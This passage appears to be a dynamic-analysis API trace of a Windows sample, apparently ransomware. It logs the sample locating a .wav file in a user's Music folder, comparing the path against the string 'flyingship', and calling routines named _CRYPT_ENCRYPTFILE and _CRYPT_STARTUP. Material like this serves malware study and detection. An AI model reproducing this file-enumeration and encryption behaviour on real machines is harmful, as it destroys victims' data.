lpString2=".", cchCount2=1) returned 3 [0187.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.269] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.269] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.269] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf0c5e0, ftCreationTime.dwHighDateTime=0x1d5e693, ftLastAccessTime.dwLowDateTime=0xef68d520, ftLastAccessTime.dwHighDateTime=0x1d5dea6, ftLastWriteTime.dwLowDateTime=0xef68d520, ftLastWriteTime.dwHighDateTime=0x1d5dea6, nFileSizeHigh=0x0, nFileSizeLow=0x2435, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="X4YFdz60f6cKTl.wav", cAlternateFileName="X4YFDZ~1.WAV")) returned 0x90add8 [0187.270] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.270] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.270] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf0c5e0, ftCreationTime.dwHighDateTime=0x1d5e693, ftLastAccessTime.dwLowDateTime=0xef68d520, ftLastAccessTime.dwHighDateTime=0x1d5dea6, ftLastWriteTime.dwLowDateTime=0xef68d520, ftLastWriteTime.dwHighDateTime=0x1d5dea6, nFileSizeHigh=0x0, nFileSizeLow=0x2435, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="X4YFdz60f6cKTl.wav", cAlternateFileName="X4YFDZ~1.WAV")) returned 0x90add8 [0187.271] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.271] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YFdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fdz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dz60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="60f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6cKTl.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.275] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.275] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0187.275] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.275] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.275] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.275] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.275] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.275] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.275] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.275] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf0c5e0, ftCreationTime.dwHighDateTime=0x1d5e693, ftLastAccessTime.dwLowDateTime=0xef68d520, ftLastAccessTime.dwHighDateTime=0x1d5dea6, ftLastWriteTime.dwLowDateTime=0xef68d520, ftLastWriteTime.dwHighDateTime=0x1d5dea6, nFileSizeHigh=0x0, nFileSizeLow=0x2435, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="X4YFdz60f6cKTl.wav", cAlternateFileName="X4YFDZ~1.WAV")) returned 0x90af58 [0187.275] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.276] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.276] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.276] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.276] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.276] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.276] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0187.276] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.276] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.276] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0187.276] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.276] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.276] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.276] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.276] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.277] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0187.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 